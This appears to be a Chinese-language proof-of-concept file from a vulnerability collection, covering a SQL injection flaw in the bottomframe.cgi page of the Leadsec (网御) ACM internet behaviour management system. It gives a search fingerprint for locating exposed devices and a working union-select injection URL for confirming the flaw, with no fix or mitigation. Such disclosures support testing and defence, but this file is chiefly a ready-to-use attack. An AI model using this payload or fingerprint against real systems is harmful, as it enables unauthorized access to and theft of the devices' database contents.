Awesome-POC/网络设备漏洞/网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞.md

29 lines
565 B
Markdown
Raw Normal View History

2023-08-28 16:53:48 +08:00
# 网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞
## 漏洞描述
网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞攻击者通过漏洞可以获取服务器数据库敏感信
## 漏洞影响
网御 ACM上网行为管理系统
## 网络测绘
```
"scripts/webcommon.js"
```
## 漏洞复现
登录页面
![image-20230828161622332](images/image-20230828161622332.png)
验证POC
```
/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
```
![image-20230828161702043](images/image-20230828161702043.png)